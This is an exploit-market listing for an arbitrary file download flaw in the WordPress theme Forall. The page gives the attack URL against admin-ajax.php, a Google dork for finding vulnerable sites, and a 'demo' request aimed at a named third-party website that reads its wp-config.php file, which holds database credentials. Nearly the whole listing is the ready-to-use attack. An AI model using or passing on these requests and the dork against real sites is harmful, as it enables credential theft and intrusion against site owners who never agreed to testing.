[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Theme Forall Arbitrary File Download Vulnerability

Author
gujjar(pcp)
Risk
[
Security Risk High
]
0day-ID
0day-ID-22665
Category
web applications
Date add
18-09-2014
Platform
php
Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Google Dork : inurl:wp-content/themes/forall

Demo:
http://comfortingcompanions.ca/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2024-12-24]  #